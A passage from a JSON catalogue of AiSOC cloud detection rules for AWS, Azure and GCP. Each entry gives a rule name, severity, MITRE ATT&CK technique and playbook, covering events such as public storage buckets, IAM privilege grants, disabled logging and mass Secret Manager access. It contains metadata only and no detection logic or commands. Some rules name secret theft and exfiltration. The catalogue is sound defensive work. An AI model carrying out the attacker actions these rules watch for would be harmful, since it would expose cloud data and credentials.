Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "azure", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-app-registration-permissive-scope.yaml" }, { "id": "det-cloud-024", "type": "detection", "name": "Azure AD Login from Tor / Anonymous IP", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure AD Login from Tor / Anonymous IP'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "azure", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-login-anonymous-ip.yaml" }, { "id": "det-cloud-025", "type": "detection", "name": "Azure Resource Mass Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Azure Resource Mass Deletion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "azure", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/azure-resource-mass-delete.yaml" }, { "id": "det-cloud-026", "type": "detection", "name": "GCP IAM Primitive Role (Owner/Editor) Granted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP IAM Primitive Role (Owner/Editor) Granted'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-iam-primitive-role-grant.yaml" }, { "id": "det-cloud-027", "type": "detection", "name": "GCP Service Account Key Created", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Key Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "gcp", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-service-account-key-created.yaml" }, { "id": "det-cloud-028", "type": "detection", "name": "GCP GCS Bucket Set to Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP GCS Bucket Set to Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-gcs-bucket-public.yaml" }, { "id": "det-cloud-029", "type": "detection", "name": "GCP Firewall Rule Allowing 0.0.0.0/0 Inbound", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Firewall Rule Allowing 0.0.0.0/0 Inbound'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "gcp", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-firewall-rule-allow-all.yaml" }, { "id": "det-cloud-030", "type": "detection", "name": "GCP Project Marked for Deletion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Project Marked for Deletion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "gcp", "playbook": "tpl-data-destruction", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-project-deletion.yaml" }, { "id": "det-cloud-031", "type": "detection", "name": "GCP Audit Log Sink Disabled or Deleted", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Audit Log Sink Disabled or Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-audit-log-sink-disabled.yaml" }, { "id": "det-cloud-032", "type": "detection", "name": "GCP Organization Policy Modified", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Organization Policy Modified'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "gcp", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-org-policy-modified.yaml" }, { "id": "det-cloud-033", "type": "detection", "name": "GCP Service Account Impersonation Outside Allowlist", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Service Account Impersonation Outside Allowlist'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "gcp", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-service-account-impersonation.yaml" }, { "id": "det-cloud-034", "type": "detection", "name": "GCP Secret Manager Mass AccessSecretVersion", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP Secret Manager Mass AccessSecretVersion'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1555.005", "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-secret-manager-mass-export.yaml" }, { "id": "det-cloud-035", "type": "detection", "name": "GCP BigQuery Dataset Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'GCP BigQuery Dataset Made Public'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "gcp", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/gcp-bigquery-dataset-public.yaml" }, { "id": "det-cloud-036", "type": "detection", "name": "Cloud Workload Spawned with Secrets in Environment Variables", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cloud Workload Spawned with Secrets in Environment Variables'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1552.001" ], "log_source": "cloud", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-secrets-in-env.yaml" }, { "id": "det-cloud-037", "type": "detection", "name": "Container Registry Repository Made Public", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Container Registry Repository Made Public'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1525" ], "log_source": "cloud", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-container-registry-public.yaml" }, { "id": "det-cloud-038", "type": "detection", "name": "Terraform State File Stored in Public Bucket", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Terraform State File Stored in Public Bucket'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530", "T1552.001" ], "log_source": "cloud", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-tfstate-public.yaml" }, { "id": "det-cloud-039", "type": "detection", "name": "Internet-Facing Load Balancer Without WAF", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Internet-Facing Load Balancer Without WAF'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1190" ], "log_source": "cloud", "playbook": "tpl-cloud-misconfig", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-internet-load-balancer-no-waf.yaml" }, { "id": "det-cloud-040", "type": "detection", "name": "Cross-Account Trust Added to Privileged Role", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'Cross-Account Trust Added to Privileged Role'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "cloud", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/cloud-cross-account-trust-add.yaml" }, { "id": "det-cloud-041", "type": "detection", "name": "AWS IAM AdministratorAccess Policy Attached", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM AdministratorAccess Policy Attached'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-attach-administrator-access.yaml" }, { "id": "det-cloud-042", "type": "detection", "name": "AWS IAM Access Key Older Than 365 Days", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Access Key Older Than 365 Days'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1078.004" ], "log_source": "aws", "playbook": "tpl-credential-hygiene", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-key-rotation-skipped.yaml" }, { "id": "det-cloud-043", "type": "detection", "name": "AWS IAM MFA Removed From Privileged User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM MFA Removed From Privileged User'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1556.006" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-mfa-disabled-on-priv-user.yaml" }, { "id": "det-cloud-044", "type": "detection", "name": "AWS IAM Role Trust Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Role Trust Policy Allows Principal '*''. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1078.004", "T1098.001" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-role-trust-broadened-wildcard.yaml" }, { "id": "det-cloud-045", "type": "detection", "name": "AWS IAM Policy Version Set With Wildcard Action", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Policy Version Set With Wildcard Action'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-policy-version-set-default-broad.yaml" }, { "id": "det-cloud-046", "type": "detection", "name": "AWS IAM Permissions Boundary Removed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Permissions Boundary Removed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-permissions-boundary-removed.yaml" }, { "id": "det-cloud-047", "type": "detection", "name": "AWS IAM SAML Provider Updated", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM SAML Provider Updated'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-saml-provider-modified.yaml" }, { "id": "det-cloud-048", "type": "detection", "name": "AWS IAM Role Trusts Foreign Account Root", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Role Trusts Foreign Account Root'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-cross-account-role-broad-trust.yaml" }, { "id": "det-cloud-049", "type": "detection", "name": "AWS IAM Role Trusts Anonymous Federation", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Role Trusts Anonymous Federation'.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-anonymous-role-trust.yaml" }, { "id": "det-cloud-050", "type": "detection", "name": "AWS IAM CreateUser Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM CreateUser Burst'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1136.003" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-create-user-burst.yaml" }, { "id": "det-cloud-051", "type": "detection", "name": "AWS IAM GetAccountSummary Recon Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM GetAccountSummary Recon Burst'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "low", "category": "cloud", "mitre_techniques": [ "T1087.004" ], "log_source": "aws", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-account-summary-recon.yaml" }, { "id": "det-cloud-052", "type": "detection", "name": "AWS IAM ListAccessKeys Recon Across Users", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM ListAccessKeys Recon Across Users'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1087.004" ], "log_source": "aws", "playbook": "tpl-discovery", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-list-keys-recon.yaml" }, { "id": "det-cloud-053", "type": "detection", "name": "AWS IAM Login Profile Added To Existing User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Login Profile Added To Existing User'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-login-profile-created-existing-user.yaml" }, { "id": "det-cloud-054", "type": "detection", "name": "AWS IAM Access Key Created For Another User", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Access Key Created For Another User'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098.001" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-access-key-created-other-user.yaml" }, { "id": "det-cloud-055", "type": "detection", "name": "AWS IAM Policy Created With NotAction Wildcard", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS IAM Policy Created With NotAction Wildcard'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-iam-policy-with-notaction.yaml" }, { "id": "det-cloud-056", "type": "detection", "name": "AWS S3 Block Public Access Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Block Public Access Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-block-public-access-disabled.yaml" }, { "id": "det-cloud-057", "type": "detection", "name": "AWS S3 Bucket Policy Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Bucket Policy Allows Principal '*''. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-bucket-policy-allows-anonymous.yaml" }, { "id": "det-cloud-058", "type": "detection", "name": "AWS S3 Replication Configured To External Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Replication Configured To External Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-replication-to-foreign-account.yaml" }, { "id": "det-cloud-059", "type": "detection", "name": "AWS S3 Server Access Logging Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Server Access Logging Disabled'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1562.008" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-server-access-logging-disabled.yaml" }, { "id": "det-cloud-060", "type": "detection", "name": "AWS S3 Object Lock / Retention Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Object Lock / Retention Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-object-lock-disabled.yaml" }, { "id": "det-cloud-061", "type": "detection", "name": "AWS S3 Mass DeleteObject Burst", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS S3 Mass DeleteObject Burst'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-s3-mass-deleteobject.yaml" }, { "id": "det-cloud-062", "type": "detection", "name": "AWS EBS Snapshot Shared With Foreign Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EBS Snapshot Shared With Foreign Account'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ebs-snapshot-shared-foreign.yaml" }, { "id": "det-cloud-063", "type": "detection", "name": "AWS AMI Shared Publicly", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS AMI Shared Publicly'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ami-shared-public.yaml" }, { "id": "det-cloud-064", "type": "detection", "name": "AWS EC2 Instance Launched With IMDSv1 Allowed", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 Instance Launched With IMDSv1 Allowed'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1552.005" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-imds-v1-allowed.yaml" }, { "id": "det-cloud-065", "type": "detection", "name": "AWS EC2 Key Pair Imported", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 Key Pair Imported'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1098.004" ], "log_source": "aws", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-key-pair-imported.yaml" }, { "id": "det-cloud-066", "type": "detection", "name": "AWS EC2 DisableApiStop Protection Revoked", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 DisableApiStop Protection Revoked'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-disable-api-stop-revoked.yaml" }, { "id": "det-cloud-067", "type": "detection", "name": "AWS EC2 UserData Modified On Running Instance", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS EC2 UserData Modified On Running Instance'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1059.001", "T1059.004" ], "log_source": "aws", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-ec2-userdata-modified-running.yaml" }, { "id": "det-cloud-068", "type": "detection", "name": "AWS VPC Default Route Pointed At New IGW", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS VPC Default Route Pointed At New IGW'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1090" ], "log_source": "aws", "playbook": "tpl-command-and-control", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-vpc-route-to-internet-gateway.yaml" }, { "id": "det-cloud-069", "type": "detection", "name": "AWS SG Rule Allows SSH From 0.0.0.0/0", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SG Rule Allows SSH From 0.0.0.0/0'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-security-group-rule-add-22-from-anywhere.yaml" }, { "id": "det-cloud-070", "type": "detection", "name": "AWS SG Rule Allows RDP From 0.0.0.0/0", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS SG Rule Allows RDP From 0.0.0.0/0'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1133" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-security-group-rule-add-3389-from-anywhere.yaml" }, { "id": "det-cloud-071", "type": "detection", "name": "AWS VPC Peering Connection Across Organizations", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS VPC Peering Connection Across Organizations'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1199" ], "log_source": "aws", "playbook": "tpl-initial-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-vpc-peering-cross-org.yaml" }, { "id": "det-cloud-072", "type": "detection", "name": "AWS RDS Instance Modified To Publicly Accessible", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Instance Modified To Publicly Accessible'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "cloud", "mitre_techniques": [ "T1530" ], "log_source": "aws", "playbook": "tpl-data-exposure", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-publicly-accessible-true.yaml" }, { "id": "det-cloud-073", "type": "detection", "name": "AWS RDS Snapshot Shared With Other Account", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Snapshot Shared With Other Account'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1537" ], "log_source": "aws", "playbook": "tpl-exfiltration", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-snapshot-shared.yaml" }, { "id": "det-cloud-074", "type": "detection", "name": "AWS RDS IAM Authentication Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS IAM Authentication Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1556" ], "log_source": "aws", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-iam-auth-disabled.yaml" }, { "id": "det-cloud-075", "type": "detection", "name": "AWS RDS Master User Password Reset", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Master User Password Reset'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "cloud", "mitre_techniques": [ "T1098" ], "log_source": "aws", "playbook": "tpl-credential-access", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-master-password-reset.yaml" }, { "id": "det-cloud-076", "type": "detection", "name": "AWS RDS Deletion Protection Disabled", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS RDS Deletion Protection Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "cloud", "mitre_techniques": [ "T1485" ], "log_source": "aws", "playbook": "tpl-impact", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/cloud/aws-rds-deletion-protection-disabled.yaml" }, { "id": "det-cloud-077", "type": "detection", "name": "AWS Lambda AddPermission Allows Principal '*'", "description": "AiSOC v1 curated detection. Triggers on the cloud signal described by 'AWS Lambda AddPermission Allows Principal '*''. 
